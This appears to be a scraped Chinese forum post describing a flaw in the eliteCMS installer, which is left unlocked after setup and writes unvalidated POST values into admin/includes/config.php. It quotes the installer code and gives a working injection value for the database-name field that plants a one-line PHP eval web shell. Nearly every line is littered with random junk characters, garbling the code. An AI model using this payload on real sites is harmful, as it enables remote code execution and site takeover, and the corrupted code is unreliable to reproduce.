eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
, y1 k2 Y1 V/ ?: `/ W/ M9 V" P3 c# q
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php6 O H8 j* h2 Q- l
我们来看代码:& h; h2 Q/ I9 m G' u. [. B
4 u: p* E2 ^$ ~
...7 c' v+ B# K) v" l( R" ?6 j" ?
elseif ($_GET['step'] == "4") {' m9 H) ^4 ]+ Z8 Q
$file = "../admin/includes/config.php";
/ K! B9 x" _- O- Z: U $write = "<?php\n"; |5 I/ N- T9 N' R
$write .= "/**\n";
7 J6 ~+ E; \# I/ u( p f! J, d $write .= "*\n";* |3 ]: s+ U" ^ g
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
8 T3 t2 C; [) \...略...
, q1 N+ B4 _: [3 ? [, ] $write .= "*\n";
1 _4 Y5 ] H' O" P( E$ V $write .= "*/\n";
% W, w0 K. |/ l. _ $write .= "\n";% Z* b% z. v4 | _& h( x7 b; y
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
) O' V4 ^$ `& P \7 ?3 o $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";4 B& U% b" ]6 q v1 B$ c4 W
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
' p4 y- _3 _- X; X) A3 w0 b6 A $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
: T, |0 M1 F% ~7 F) S! H+ { $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";- E* D5 O' Q! u- @' W# R+ \
$write .= "if (!\$connection) {\n";
$ X! \/ O8 Y: a! [: f$ I' y $write .= " die(\"Database connection failed\" .mysql_error());\n";
: X' ` E7 X# p {( K $write .= " \n";
' ^0 w& {2 L4 \' c6 e/ @ p $write .= "} \n";
+ V9 h' Y" w: a( \ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
4 t6 C) J; a, C- ]- Y $write .= "if (!\$db_select) {\n";( q7 S, y6 S. u1 }0 B/ \
$write .= " die(\"Database select failed\" .mysql_error());\n";. V7 R: J+ o; E) {; t
$write .= " \n";7 q- T" x2 j0 L* D
$write .= "} \n";6 w; ]* d" C2 u, S" o( i
$write .= "?>\n";9 o% ~$ F' a- ^. ^
9 N1 I# x* H8 M# b $writer = fopen($file, 'w');2 S( p: T% P" Y4 w6 w% L2 q
...
0 ~2 X4 R5 h! b8 ^, l3 C 6 d W" _$ F X3 W. O& u
在看代码:$ a# {1 D9 r# J( j5 y7 n/ X% b
$ @2 }: g2 W2 J' ]2 b$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];3 q" _0 `" q/ p# J3 C. P
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
( Q: M7 s. m( H* ]1 l5 J$ w$_SESSION['DB_USER'] = $_POST['DB_USER'];
- Y, y* i3 Y8 c" o7 i9 t, |$_SESSION['DB_PASS'] = $_POST['DB_PASS'];+ I( q4 ~9 _ Q- N
6 G6 g2 T, }9 R- {6 u3 h
取值未作任何验证9 W# x: U7 |6 D7 i3 b
如果将数据库名POST数据:
9 Q* g- }) |7 Y9 y 8 k- b( Y# [: K; s; [" {. L
"?><?php eval($_POST[c]);?><?php2 J6 [1 r! B) v# R) F/ `
R3 K: i3 o9 P: u( x* Q6 i" d* `/ P
将导致一句话后门写入/admin/includes/config.php
$ x( `- G, E) g, P+ c |